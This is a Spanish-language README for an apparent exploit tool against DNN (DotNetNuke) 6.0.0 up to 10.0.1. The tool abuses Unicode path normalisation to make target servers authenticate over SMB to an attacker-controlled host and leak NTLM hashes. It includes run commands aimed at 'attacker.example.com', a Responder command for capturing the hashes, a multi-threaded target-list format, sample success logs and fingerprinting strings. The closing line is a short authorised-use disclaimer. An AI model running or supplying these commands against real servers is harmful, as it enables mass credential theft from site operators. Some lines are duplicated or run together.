
Este exploit apunta a una vulnerabilidad en DNN (anteriormente DotNetNuke) versiones 6.0.0 hasta antes de 10.0.1 que permite a los atacantes divulgar hashes NTLM mediante ataques de normalización de rutas Unicode.
Este exploit apunta a una vulnerabilidad en DNN (anteriormente DotNetNuke) versiones 6.0.0 hasta antes de 10.0.1 que permite a los atacantes divulgar hashes NTLM mediante ataques de normalización de rutas Unicode.
El exploit abusa de peculiaridades de Windows/.NET y la normalización Unicode para forzar al servidor DNN objetivo a realizar solicitudes SMB a un servidor controlado por el atacante, exponiendo potencialmente hashes NTLM durante el proceso de autenticación.
pip install -r requirements.txt)python main.py targets.txt attacker.example.com
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
targets: Archivo que contiene la lista de hosts DNN (uno por línea)smb_server: Hostname/IP del servidor SMB para capturar hashes NTLM-t, --threads: Número de hilos concurrentes (por defecto: 10)--timeout: Tiempo de espera de solicitud en segundos (por defecto: 10)Cree un archivo de texto con las URL objetivo, una por línea:
http://target1.example.com
https://target2.example.com:8080
target3.example.com
Puede usar herramientas como Responder para capturar hashes NTLM:
responder -I eth0 -wrf
O use Burp Collaborator para detección fuera de banda.
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts
El exploit busca los siguientes indicadores de DNN:
dnn_IsMobiledotnetnuke en la respuestadnnconnect en la respuestaDNN Platform en la respuestaEsta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. Úsela de manera responsable y solo en sistemas que posea o tenga permiso explícito para probar.